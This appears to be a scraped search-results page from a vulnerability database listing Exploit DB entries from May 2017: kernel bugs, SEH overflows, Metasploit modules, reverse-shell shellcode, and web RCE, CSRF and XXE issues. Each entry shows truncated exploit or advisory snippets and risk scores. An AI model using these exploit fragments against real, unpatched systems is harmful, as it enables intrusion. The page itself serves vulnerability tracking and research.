
47885 matches found

Exploit DB
added 2017/05/17 12:00 a.m., 29 views

Adobe Flash - AVC Deblocking Out-of-Bounds Read

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1171 The attached swf triggers an out-of-bounds read in AVC deblocking. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42017.zip...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/17 12:00 a.m., 33 views

Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution

!/usr/bin/python3 Oracle PeopleSoft SYSTEM RCE https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce cf 2017-05-17 import requests import urllib.parse import re import string import random import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/17 12:00 a.m., 22 views

Adobe Flash - Out-of-Bounds Read in Getting TextField Width

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1211 The attached swf causes an out-of-bounds read in getting the width of a TextField. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42019.zip...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/17 12:00 a.m., 128 views

Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1107 Windows: COM Aggregate Marshaler/IRemUnknown2 Type Confusion EoP Platform: Windows 10 10586/14393 not tested 8.1 Update 2 Class: Elevation of Privilege Summary: When accessing an OOP COM object using IRemUnknown2 the local...

7.2 CVSS, 7 AI score, 0.01396 EPSS
Exploits: 4
Exploit DB
added 2017/05/15 12:00 a.m., 35 views

Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1145 We have observed on Windows 7 32-bit that for unclear reasons, the kernel-mode structure containing the default DACL of system processes' tokens lsass.exe, services.exe, ... has 8 uninitialized bytes at the end, as the size ...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/15 12:00 a.m., 56 views

Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1127 We have identified two related bugs in Windows kernel code responsible for implementing the bind socket function, specifically in the afd!AfdBind and tcpip!TcpBindEndpoint routines. They both can lead to reading beyond the...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/15 12:00 a.m., 51 views

Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Quest Privilege Manager pmmasterd Buffer Overflow', 'Description' = %q This modules exploits a buffer overflow in the Quest Privilege Manager, a...

8.3 AI score
Exploits: 0
Exploit DB
added 2017/05/15 12:00 a.m., 27 views

Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1161 We have discovered that the handler of the nt!NtTraceControl system call specifically the EtwpSetProviderTraitsUm functionality, opcode 0x1E discloses portions of uninitialized pool memory to user-mode clients on Windows 10...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/15 12:00 a.m., 15 views

LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow (SEH)

!/usr/bin/python print "LabF nfsAxe 3.7 FTP Client Buffer Overflow SEH" print "Author: Tulpa / tulpaattulpa-securitydotcom" Author website: www.tulpa-security.com Author twitter: @tulpasecurity Tested on Windows Vista x86 import socket import sys badchars \x00\x10\x0a buf = "" buf +=...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/15 12:00 a.m., 52 views

Mailcow 0.14 - Cross-Site Request Forgery

Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MAILCOW-v0.14-CSRF-PASSWORD-RESET-ADD-ADMIN.txt + ISR: ApparitionSec Vendor: ============= mailcow.email mailcow.github.io Product: =========== The integrated mailcow UI...

8.8 CVSS, 8.8 AI score, 0.00288 EPSS
Exploits: 5
Exploit DB
added 2017/05/15 12:00 a.m., 69 views

Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure

/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1182 We have discovered that it is possible to disclose portions of uninitialized kernel stack memory to user-mode applications in Windows 7 other platforms untested indirectly through the win32k!NtUserCreateWindowEx system call...

7 AI score
Exploits: 0
Exploit DB
added 2017/05/14 12:00 a.m., 48 views

Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title : Larson VizEx Reader 9.7.5 - Local Buffer Overflow SEH Date : 14/05/2017 Exploit Author : Muhann4d CVE : CVE-2017-8927 Vendor Homepage : http://www.cgmlarson.com/ Software Link : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html...

7.8 CVSS, 7.7 AI score, 0.0104 EPSS
Exploits: 4
Exploit DB
added 2017/05/14 12:00 a.m., 37 views

PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload

Exploit Title: PlaySMS 1.4 Code Execution using $filename and Unrestricted File Upload in sendfromfile.php Date: 14-05-2017 Software Link: https://playsms.org/download/ Version: 1.4 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website: http://touhidshaikh.com/...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/14 12:00 a.m., 35 views

Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title : Halliburton LogView Pro 10.0.1 - Local Buffer Overflow SEH Date : 2017-05-14 Exploit Author : Muhann4d CVE : CVE-2017-8926 Vendor Homepage : http://www.halliburton.com Software Link :...

7.8 CVSS, 7 AI score, 0.01119 EPSS
Exploits: 4
Exploit DB
added 2017/05/12 12:00 a.m., 29 views

Dive Assistant Template Builder 8.0 - XML External Entity Injection

Exploit Title: Dive Assistant - Template Builder XXE Injection + Date: 12-05-2017 + Exploit Author: Trent Gordon + Vendor Homepage: http://www.blackwave.com/ + Software Link: http://www.diveassistant.com/Products/DiveAssistantDesktop/index.aspx + Version: 8.0 + Tested on: Windows 7 SP1, Windows...

5.5 CVSS, 5.6 AI score, 0.01735 EPSS
Exploits: 3
Exploit DB
added 2017/05/11 12:00 a.m., 86 views

OpenVPN 2.4.0 - Denial of Service

!/usr/bin/env python3 ''' $ ./dosserver.py & $ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf ... Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from AFINET192.168.149.1:64249, sid=9a6c48a6 1467f5e1 Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/11 12:00 a.m., 561 views

Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule ' Microsoft IIS WebDav ScStoragePathFromUrl Overflow', 'Description' = %q Buffer overflow in the ScStoragePathFromUrl function in the WebDAV servic...

10 CVSS, 9.6 AI score, 0.94411 EPSS
Exploits: 39
Exploit DB
added 2017/05/11 12:00 a.m., 128 views

Vanilla Forums < 2.3 - Remote Code Execution

!/bin/bash Vanilla Forums = 2.3 Remote Code Execution RCE PoC Exploit 0day Core version no plugins, default config. CVE-2016-10033 RCE CVE-2016-10073 Header Injection...

9.8 CVSS, 9.3 AI score, 0.94418 EPSS
Exploits: 60
Exploit DB
added 2017/05/11 12:00 a.m., 315 views

Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation

// A proof-of-concept local root exploit for CVE-2017-7308. // Includes a SMEP & SMAP bypass. // Tested on 4.8.0-41-generic Ubuntu kernel. // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308 // // Usage: // user@ubuntu:$ uname -a // Linux ubuntu 4.8.0-41-generic 4416.04.1-Ubuntu...

7.8 CVSS, 8.1 AI score, 0.87 EPSS
Exploits: 17
Exploit DB
added 2017/05/11 12:00 a.m., 1350 views

MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service

VuNote ====== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-8798 Version: 0.6 Date: May 1st, 2017 Tag: miniupnpc getHTTPResponse chunked encoding integer signedness error Overview -------- Name: miniupnpc Vendor: Thomas Bernard References: http://miniupnp.free.fr/ 1...

9.8 CVSS, 9.6 AI score, 0.24381 EPSS
Exploits: 6
Exploit DB
added 2017/05/10 12:00 a.m., 62 views

Cisco DPC3928 Router - Arbitrary File Disclosure

Vulnerability Summary The following advisory describes an arbitrary file disclosure vulnerability found in Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway. The Cisco DPC3928AD DOCSIS is a home wireless router that is currently "Out of support" but is provided by ISPs world wide. Credit An...

9.8 CVSS, 9.8 AI score, 0.10345 EPSS
Exploits: 3
Exploit DB
added 2017/05/10 12:00 a.m., 48 views

CMS Made Simple 2.1.6 - Multiple Vulnerabilities

Title: CMSMS 2.1.6 Multiple Vulnerabilities Date: 10-05-2017 Tested on: Windows 8 64-bit Exploit Author: Osanda Malith Jayathissa @OsandaMalith Original write-up: https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/ CVE: CVE-2017-8912 Remote Code Execution...

7.2 CVSS, 7 AI score, 0.03714 EPSS
Exploits: 4
Exploit DB
added 2017/05/10 12:00 a.m., 48 views

QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass

Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass Date: 10.05.2017 Software Link: https://www.qnap.com Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: web 1. Description $COOKIESTATIONSID is not...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/10 12:00 a.m., 496 views

Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)

Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com Date and time of release: May, 9 2017 - 13:00PM Found this and more exploits on my open source security project: http://www.exploitpack.com MS17-010 - https://technet.microsoft.com/en-us/library/security/ms17-010.aspx Tested on:...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/10 12:00 a.m., 23 views

Gongwalker API Manager 1.1 - Cross-Site Request Forgery

Exploit Title: gongwalker API Manager v1.1 - CSRFAdd/Delete/Edit API Date: 2017-05-10 Exploit Author: HaHwul Exploit Author Blog: www.hahwul.com Vendor Homepage: https://github.com/gongwalker/ApiManager Software Link: https://github.com/gongwalker/ApiManager.git Version: v1.1 Tested on: Debian...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/10 12:00 a.m., 75 views

SAP SAPCAR 721.510 - Heap Buffer Overflow

''' Source: https://www.coresecurity.com/advisories/sap-sapcar-heap-based-buffer-overflow-vulnerability 1. Advisory Information Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability Advisory ID: CORE-2017-0001 Advisory URL:...

7.8 CVSS, 7.7 AI score, 0.01682 EPSS
Exploits: 5
Exploit DB
added 2017/05/10 12:00 a.m., 30 views

BanManager WebUI 1.5.8 - PHP Code Injection

BanManager WebUI 1.5.8 - PHP Code Injection & Stored XSS Exploit Title: BanManager WebUI - PHP Code Injection & Stored XSS Date: 2017-05-10 Exploit Author: HaHwul Exploit Author Blog: www.hahwul.com Vendor Homepage: https://github.com/BanManagement/BanManager-WebUI Software Link:...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/10 12:00 a.m., 214 views

Intel Active Management Technology - System Privileges

!/usr/bin/python -- coding: utf-8 -- Author: Nixawk CVE-2017-5689 = dork="Server: IntelR Active Management Technology" port:"16992", ports= 623, 664, 16992, 16993, 16994, 16995 products= Active Management Technology AMT, Intel Standard Manageability ISM, Intel Small Business Technology SBT versio...

10 CVSS, 7 AI score, 0.94194 EPSS
Exploits: 7
Exploit DB
added 2017/05/09 12:00 a.m., 33 views

Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions

Exploit Title: Discover all tables and columns in database when creating new customer role Date: 3/29/2017 Exploit Author: Pesach Zirkind Vendor Homepage: https://personifycorp.com/ Version: 7.5.2 - 7.6.1 Tested on: Windows all versions CVE : CVE-2017-7314 Category: webapps 1. Description Any...

7.5 CVSS, 7.7 AI score, 0.08852 EPSS
Exploits: 3
Exploit DB
added 2017/05/09 12:00 a.m., 56 views

wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One

TALOS-2017-0293 WOLFSSL LIBRARY X509 CERTIFICATE TEXT PARSING CODE EXECUTION VULNERABILITY MAY 8, 2017 CVE-2017-2800 SUMMARY An exploitable off-by-one write vulnerability exists in the x509 certificate parsing functionality of wolfSSL library versions up to 3.10.2. A specially crafted x509...

9.8 CVSS, 9 AI score, 0.08887 EPSS
Exploits: 5
Exploit DB
added 2017/05/09 12:00 a.m., 41 views

LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflow

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1124 There are multiple paths in mkvparser::Block::Block... that result in heap buffer overflows. See attached for sample files that trigger the overflow conditions - these will not reliably crash the process, since the overflows a...

7 AI score
Exploits: 0
Exploit DB
added 2017/05/09 12:00 a.m., 65 views

I, Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities product: I, Librarian PDF manager vulnerable version: =4.6 & 4.7 fixed version: 4.8 CVE number: - impact: Critical homepage:...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/09 12:00 a.m., 27 views

Personify360 7.5.2/7.6.1 - Improper Access Restrictions

Exploit Title: Access and read and create vendor / API credentials in plaintext Date: 3/29/2017 Exploit Author: Pesach Zirkind Vendor Homepage: https://personifycorp.com/ Version: 7.5.2 - 7.6.1 Tested on: Windows all versions CVE : CVE-2017-7312 Category: webapps 1. Description Any website visito...

9.8 CVSS, 9.7 AI score, 0.08326 EPSS
Exploits: 2
Exploit DB
added 2017/05/09 12:00 a.m., 41 views

Crypttech CryptoLog - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Crypttech CryptoLog Remote Code Execution", 'Description' = %q This module exploits the sql injection and command injection vulnerability of...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/09 12:00 a.m., 189 views

Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 MsMpEng is the Malware Protection service that is enabled by default on Windows 8, 8.1, 10, Windows Server 2012, and so on. Additionally, Microsoft Security Essentials, System Centre Endpoint Protection and various othe...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/09 12:00 a.m., 25 views

LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1117 Failure to initialise pointers in mkvparser::Tracks constructor The constructor mkvparser::Tracks::Tracks doesn't handle parsing failures correctly. If we look at the function, it makes allocations in two places; the first whe...

7 AI score
Exploits: 0
Exploit DB
added 2017/05/09 12:00 a.m., 29 views

LG G4 MRA58K - 'liblg_parser_mkv.so' Bad Allocation Calls

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1102 In both of the following functions mkvparser::AudioTrack::AudioTrackmkvparser::Segment, mkvparser::Track::Info const&, long long, long long mkvparser::VideoTrack::VideoTrackmkvparser::Segment, mkvparser::Track::Info const&, lo...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/09 12:00 a.m., 72 views

Oracle GoldenGate 12.1.2.0.0 - Remote Code Execution

!/usr/bin/env python Sources: https://silentsignal.hu/docs/S2OracleGoldenGateGOLDENSHOWER.py https://blog.silentsignal.eu/2017/05/08/fools-of-golden-gate/ GOLDENSHOWER - Oracle GoldenGate unauthenticated RCE by Silent Signal Tested with: Version 12.1.2.0.0 17185003...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/08 12:00 a.m., 36 views

Linux/x86 - Disable ASLR Shellcode (80 bytes)

Linux/x86 - Disable ASLR Shellcode 80 bytes. Shellcode exploit for Linx86 platform / Linux/x86 setuid-disable-aslr.c by @abatchy17 - abatchy.com Shellcode size: 80 bytes SLAE-885 section .text global start start: ; ; setruid0,0 ; xor ecx,ecx mov ebx,ecx push 0x46 pop eax int 0x80 ; ;...

0.1 AI score
Exploits: 0
Exploit DB
added 2017/05/08 12:00 a.m., 31 views

Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)

Exploit Title: Gemalto SmartDiag Diagnosis Tool = v2.5 - Buffer Overflow - SEH Overwrite Date: 16-03-2017 Software Link: http://support.gemalto.com/index.php?id=downloadtools Exploit Author: Majid Alqabandi Contact: https://www.linkedin.com/in/majidalqabandi/ CVE: CVE-2017-6953 Category: Local -...

7.8 CVSS, 7.7 AI score, 0.00218 EPSS
Exploits: 5
Exploit DB
added 2017/05/08 12:00 a.m., 132 views

RPCBind / libtirpc - Denial of Service

!/usr/bin/ruby Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb By Guido Vranken https://guidovranken.wordpress.com/ Thanks to Sean Verity for writing an exploit in Ruby for an earlier vulnerability:...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/08 12:00 a.m., 47 views

Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)

Linux/x86-64 - Reverse Shell Shellcode IPv6 113 bytes. Shellcode exploit for Linx86-64 platform BITS 64 ; reverse ip6 tcp shell ; size = 113 bytes depends of ip addr, default is ::1 ; nullbytes free depends only on ip addr, ; you could always and the ip add to remove ; the nulls like i did with t...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/08 12:00 a.m., 35 views

MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow SEH CVE : CVE-2017-8869 Exploit Author : Muhann4d @0xSecured Vendor Homepage : http://www.mediacoderhq.com Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe Vulnerable Version...

7.8 CVSS, 7.7 AI score, 0.3536 EPSS
Exploits: 6
Exploit DB
added 2017/05/08 12:00 a.m., 55 views

Xen 64bit PV Guest - pagetable use-after-type-change Breakout

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1231 This is a bug in Xen that permits an attacker with control over the kernel of a 64bit X86 PV guest to write arbitrary entries into a live top-level pagetable. To prevent PV guests from doing things like mapping live pagetables...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/05 12:00 a.m., 66 views

Technicolor DPC3928SL - SNMP Authentication Bypass

!/usr/bin/python -- coding: utf-8 -- StringBleed - CVE-2017-5135 author = "Nixawk" funcs = 'generatesnmpcommunitystr', 'generatesnmpprotopayload', 'sendsnmprequest', 'readsnmpcommunitystr', 'readsnmpvarbindstr', 'snmplogin', 'snmpstringbleed' import struct import uuid import socket import time...

9.1 CVSS, 9.4 AI score, 0.22367 EPSS
Exploits: 3
Exploit DB
added 2017/05/05 12:00 a.m., 54 views

ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities

CVE-2017-6086 Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15 Product Description ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL licen...

8.8 CVSS, 8.8 AI score, 0.00168 EPSS
Exploits: 5
Exploit DB
added 2017/05/05 12:00 a.m., 42 views

WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection

Source: http://www.defensecode.com/advisories/DC-2017-02-011WordPressWebDoradoGalleryPluginAdvisory.pdf DefenseCode ThunderScan SAST Advisory WordPress WebDorado Gallery Plugin - SQL Injection Vulnerability Advisory ID: DC-2017-02-011 Software: WordPress WebDorado Gallery Plugin Software Language...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/05 12:00 a.m., 30 views

Sitecore CMS 8.2 - Cross-Site Scripting / Arbitrary File Disclosure

Exploit title: Sitecore CMS v8.2 multiple vulnerabilities Product: Sitecore Version: 8.2, Rev: 161221, Date: 21st December, 2016 Date: 05-05-2017 Author: Usman Saeed Email: [email protected] Vendor Homepage: http://www.sitecore.net/ Disclaimer: Everything mentioned below is for educational puposes...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/05 12:00 a.m., 270 views

CloudBees Jenkins 2.32.1 - Java Deserialization

Source: https://blogs.securiteam.com/index.php/archives/3171 Vulnerability Details Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent. The vulnerability can be found in the implementation of a bidirectional communicati...

7.4 AI score
Exploits: 0
Exploit DB
added 2017/05/04 12:00 a.m., 85 views

Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free

function makecompiledfunction function targetx return x5 + x - xx; // Call only once so that function gets compiled with low level interpreter // but none of the optimizing JITs target0; return target; function pwn var haxs = new Array0x100; for var i = 0; i 0x100; ++i haxsi = new Uint8Array0x100...

8.8 CVSS, 8.2 AI score, 0.21689 EPSS
Exploits: 4
Total number of security vulnerabilities: 47885